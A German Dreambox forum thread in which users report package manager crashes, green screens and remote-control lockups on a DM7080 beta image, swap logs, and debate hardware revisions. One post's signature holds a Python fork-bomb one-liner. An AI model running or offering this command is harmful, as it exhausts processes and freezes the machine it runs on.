also hier nach fast jeden neustart der box, ich häng nochmal ein komplettes log an
Angepinnt Feedback/Bugs in beta image DM7080 OE2.2
-
-
@kati910, die Offline Installation hat funktioniert.
Der Paketmanager habe ich deinstalliert und die neue Version Installiert.
Und zwischendurch rebootet.
Die LOG habe ich angehangen.
Gruß ratoGruß rato -
kati910 schrieb:
rato schrieb:
habe die Konsole gestartet. Dann den Paketmanager und die Offline Installation.
Die Datei dann ausgewählt. Dann kam der Green.
Die log ist im Anhang.
Gruß rato
Teste mal den wegen dem offlineinstall
Getestet (pantv skin):
1. Aufruf ok
Filter aktiviert (nur skins)
Exit
2. Aufruf: Zahnräder, paketmanager Maske weg, normales bild aber keine Reaktion auf FB mehr (kein greenscreen, kein crashlog) -> reboot mit telnet
Ich versuche mal mit zu loggen!
die FB!
War nicht reproduzierbar, allerdings immer wieder nach Neustart mal läuft der paketmanager ohen problem, mal kommt nach Zahnrad das normale Bild - aber keine Reaktion mehr auf die FB!
VG
karlDieser Beitrag wurde bereits 1 mal editiert, zuletzt von karl1x ()
-
So bin mit meiner neuen Box soweit fertig und ich kann das bestätigen der Paketmanager stürzt sehr häufig auch beim mir ab. Display und Bildschirm wird dann dunkel und es geht nur noch Power off auch das Update von heute hat keine Besserung gebracht.
@Deepblue
Bei mir ist der Paketmanager nicht geskinnt ich nutze noch den Newenigma2 Default HD Skin wie kann ich das ändern du hat gestern einen Screenshot gepostet da war er geskinnt. Noch eine Frage habe den elegance HD Skin mal kurz ausprobiert und bei mir ist der Text in der Infobar unten abgeschnitten sprich passt irgendwie nicht mit meinem Fernseher wie kann das sein ?1. DM7080 HD, 3 TB WD 30EZRX, 2. DM7020 HD, 2 TB WD 20EARX, FB: Logitech Harmony One
Image: OE2.2 NN2 Beta 5 unstable & OE2.0 NN2 4.11 stable -
jupzup schrieb:
Noch eine Frage habe den elegance HD Skin mal kurz ausprobiert und bei mir ist der Text in der Infobar unten abgeschnitten sprich passt irgendwie nicht mit meinem Fernseher wie kann das sein ?
Overscan am TV ausschalten. -
kati910 schrieb:
Die frage warum und nur vereinzelt?
Ich kann die Sache sogar mit meinem alten Image vom 25.1.2015 reproduzieren. -
Ich kann das nicht nachvollziehen ich kann den hier starten wie ich will.
Ich kann nur was aendern was ein fehler ist ich sehe hier keinen und ich habe keine lust mehr das zu supporten .
Loescht den einfach und feierabend ich bin raus.python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
deepblue2000 schrieb:
Es sind ja einige "Problem-User" hier bekannt, die immer mal wieder Probleme haben,
die es so nicht gibt.
Wie war das noch?
Samsung - UE55 ES 8090
Fritz!Box 7590 AX V2 + Synology DS214play - 2x WD red 4tb
DM920 FBC-S2X+Triple + DM One BT combo <-- 28E;23E;19E;13E;KD -
..mmh, vielleicht könnt ihr euch mit der Problematik auch mal netterweise an @Ghost wenden?
Das sieht mir ganz nach einen Treiberproblem mit unterschiedlichen Hardware-Revisionen aus.
Ist doch schon mekwürdig das es bei vielen funktioniert und bei einigen eben nicht.
Gruß -
Hatte heute morgen das neueste Update eingespielt. Nach Neustart den Paketmanager gestartet. Die Maske ist sofort verschwunden. Box nicht mehr bedienbar. Hauptschalter wieder mal. Hab gar net gewusst das es da schon wieder verschiedene Revisionen geben soll...."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
Perverseus schrieb:
Hab gar net gewusst das es da schon wieder verschiedene Revisionen geben soll....
Kann ich mir auch nicht vorstellen. Evtl. für die ersten Testboxen, aber sonst? -
Wenn die Hardware in Ordnung ist muß sich was geändert haben. Das Problem besteht seit den letzten 7 Updates. Vorher gings ja einwandfrei. Mist das ich von alte Version kein Backup habe. Hab gerade mal gestartet ohne Fehler. Aber die Filterauswahl funktioniert immer noch nicht. Filtert einfach nicht...."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Perverseus ()
-
Hallo !
Bin bis jetzt ganz zufrieden mit dem Paketmanager . Auch wenn er ab und zu mal abstürzt . Habe aber schon viel damit installieren können .
Es ist alles noch in den "Kinderschuhen" , bitte nicht vergessen !
Auf jeden Fall von mir ein großes DANKE an alle die an dem Img. arbeiten !
Gruß humix.Gruß
humix . -
Also es gibt mit Sicherheit schon min. 3 Revisionen.
Die Testboxen die an die Betatester und Entwickler gegangen sind.
Dann die Boxen von der erst Auslieferung mit dem großen IR Empfänger, dann kamen die mit dem kleinen IR Empfänger und nun gibt es wahrscheinlich auch wieder Änderungen.
Gab ja schon bei manchen Probleme mit Bucks Display. Einige Leute die eine Box von der Erstauslieferung hatten, hatten dann Probleme mit z.B. mit Harmony FBs.
Das nur so als BeispielSamsung - UE55 ES 8090
DM920 FBC-S2X+Triple + DM One BT combo <-- 28E;23E;19E;13E;KD -
Ok jetzt hat er normal gestartet Filter hat auch funktioniert. Bei nächsten Mal hatte ich mal wieder direkt beim Starten einen Green. Villeicht sagt ja der was aus..."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
wenn es jemand nützt hier mal meine infos vom rescue loader und bios
-
hmich schrieb:
wenn es jemand nützt hier mal meine infos vom rescue loader und bios
Sieht irgendwie unterschiedlich aus..."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier" -
ja der rescue loader ist neuer weil aktualisiert wegen backup funktion, tut aber nichts zur sache
btw dein adbock plus solltest du mal auf adblock edge umstellen -
c_town schrieb:
Gab ja schon bei manchen Probleme mit Bucks Display. Einige Leute die eine Box von der Erstauslieferung hatten, hatten dann Probleme mit z.B. mit Harmony FBs.
Das nur so als Beispiel
Ah, interessant. Und was haben die gemacht, die Probleme z.B. mit der Harmony haben? Wurden die Boxen getauscht? Gibt es da mehr Infos welche Boxen betroffen sind? -
Nein, wieso Boxen tauschen?? Was hat DMM denn mit den Farbdisplays für die 7080 am Hut ??
Das hatte nur etwas mit dem neuen Display bzw. mit dem IR Empfänger zu tun. Buck hat die Empfänger bei den Betroffenen getauscht und alles ist wieder gut.Samsung - UE55 ES 8090
DM920 FBC-S2X+Triple + DM One BT combo <-- 28E;23E;19E;13E;KD
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0
-
Benutzer online 2
2 Besucher